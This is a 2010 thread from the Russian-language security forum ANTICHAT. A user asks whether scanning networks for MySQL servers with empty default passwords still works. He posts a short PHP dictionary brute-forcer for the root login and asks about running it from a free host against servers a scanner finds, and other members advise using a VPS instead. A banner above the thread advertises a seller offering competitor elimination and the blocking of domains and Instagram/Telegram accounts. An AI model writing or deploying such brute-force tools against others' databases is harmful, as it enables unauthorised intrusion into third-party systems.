УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
пару вопросов по статейке - Взлом СУБД

Опции темы

Поиск в этой теме

Опции просмотра

пару вопросов по статейке - Взлом СУБД

15.05.2010, 00:55

Demon1X

Познающий

Регистрация: 31.05.2007

Сообщений: 39

Провел на форуме:
164949

Репутация: 0

пару вопросов по статейке - Взлом СУБД

тут вчера наткнулся на статейку http://www.inattack.ru/article/469.html

суть которой сводится к тому что можно просканить сеть каким нибудь сканером (например nmap-ом) и попробывать приконнектится к СУБД с расчетом, что когда ее устанавливали забыли по дефолту пароль поставить

1. это актуально? т.е. такое еще работает, статейка та не первой свежести

2. т.к. недавно начал изучать пых по прочтению решил набросать простой скриптик-брутер. У меня на локалхосте нормально пас подбирает к mysql. Вопрос можно ли будет его залить на фрихост с поддержкой пхп и оттуда брутить найденные сканером СУБД?

Код:

<?php
$host="localhost";
$name="root";
 
set_time_limit(0);
$f=fopen("words.dic","rt") or die("Нет файла с паролями!");

if (@mysql_connect($host,$name,"")){
   echo "Пароля нет!";
   fclose ($f);
   @mysql_close();
   exit;
}//if

while (true){
    $str=trim(fgets ($f));
	if ($str=="") break;

	if (@mysql_connect($host,$name,$str)){
	    echo "Пароль: ".$str;
		fclose ($f);
		@mysql_close();
		exit;
	}//if
}//wh
  
echo "Пароль не найден!";
fclose ($f);
?>

15.05.2010, 01:03

Adio

Постоянный

Регистрация: 23.05.2005

Сообщений: 617

Провел на форуме:
1262031

Репутация: 71

Питон. щас все хостеры на серверах закрывают внешние порты

Уже не актуально это делать

15.05.2010, 01:27

Demon1X

Познающий

Регистрация: 31.05.2007

Сообщений: 39

Провел на форуме:
164949

Репутация: 0

Цитата:

Сообщение от Adio

Питон. щас все хостеры на серверах закрывают внешние порты

Уже не актуально это делать

ммм... нубский вопросик под словом "Питон.", что имел ввиду - язык или брандмауэр какой?

Последний раз редактировалось Demon1X; 15.05.2010 в 01:30..

15.05.2010, 01:36

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Adio

Питон. щас все хостеры на серверах закрывают внешние порты

Уже не актуально это делать

фрихосты только если, ну или хосты за пять рублей.

Demon1X, можно конечно, но фрихост не пойдет, лучше с vps или выделенного сервера.

16.05.2010, 07:10

_K4_

Новичок

Регистрация: 03.02.2010

Сообщений: 11

Провел на форуме:
122064

Репутация: 0

Уверен на 100% что если где-то и будет база без пароля, то только на каком нибудь зачуханном дёдике.
На крайняк коннект только с localhost.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Пару вопросов по сайтострою	Demon1X	SЕО - тонкости, методы раскрутки	10	13.04.2010 22:14
Пару вопросов о Swift кодах и банк.счете	SultanOFF	Болталка	2	20.03.2010 11:30

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход